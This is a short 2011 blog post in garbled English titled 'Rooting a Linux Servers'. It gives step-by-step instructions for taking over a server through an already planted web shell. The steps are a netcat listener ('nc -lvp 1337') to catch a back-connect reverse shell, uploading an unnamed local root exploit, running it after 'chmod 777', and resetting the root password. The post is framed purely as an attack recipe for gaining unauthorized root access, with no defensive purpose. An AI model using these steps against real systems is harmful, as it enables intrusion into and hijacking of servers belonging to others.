Thursday, July 21, 2011

Rooting a Linux Servers

Post Author Is
ch3_hacker



First of all to be locked in by SSH shell should connect us with netcat which can be downloaded here
Put netcat to the desktop and go to cmd

Code:
cd Desktop
nc -lvp 1337
1337 = Port for netcat

[Image: 8M3cD.png]

Now we need to connect to IP Sound from the shell, shell must have back-Connect tool as follows:

[Image: MwXGv.png]

If everything has succeeded so far are associated with success in SSH Mode:

Now to obtain Root Access, we have adapted to exploit the server - You can also find in google
Now upload exploit:

[Image: lqsPx.png]

After you have uploaded execute these commands:
Code:
chmod 777 1
./1

1 (is exploit) - chmod 777 (Provision of access to file) -. / (Execution exploit)

[Image: 77pbG.png]

Now the server has become full root access
You can change password with passwd command and connect to Putty.

No comments:

Post a Comment